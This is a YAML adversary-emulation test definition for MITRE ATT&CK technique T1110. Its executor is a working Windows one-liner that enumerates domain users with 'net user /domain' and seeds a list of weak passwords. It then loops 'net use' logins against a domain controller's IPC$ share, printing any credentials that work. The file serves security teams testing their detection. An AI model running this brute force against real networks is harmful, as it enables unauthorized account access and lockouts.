---
attack_technique: T1110
display_name: Brute Force Credential Access

atomic_tests:
- name: Brute Force Credentials
  auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224
  description: |
    Creates username and password files then attempts to brute force on remote host
  supported_platforms:
    - windows
  input_arguments:
    input_file_users:
      description: Path to a file containing a list of users that we will attempt to brute force
      type: Path
      default: DomainUsers.txt
    input_file_passwords:
      description: Path to a file containing a list of passwords we will attempt to brute force with
      type: Path
      default: passwords.txt
    remote_host:
      description: Hostname of the target system we will brute force upon 
      type: String
      default: \\COMPANYDC1\IPC$
    domain:
      description: Domain name of the target system we will brute force upon 
      type: String
      default: YOUR_COMPANY
  executor: 
    name: command_prompt
    elevation_required: false
    command: |
      net user /domain > #{input_file_users}
      echo "Password1" >> #{input_file_passwords}
      echo "1q2w3e4r" >> #{input_file_passwords}
      echo "Password!" >> #{input_file_passwords}
      @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
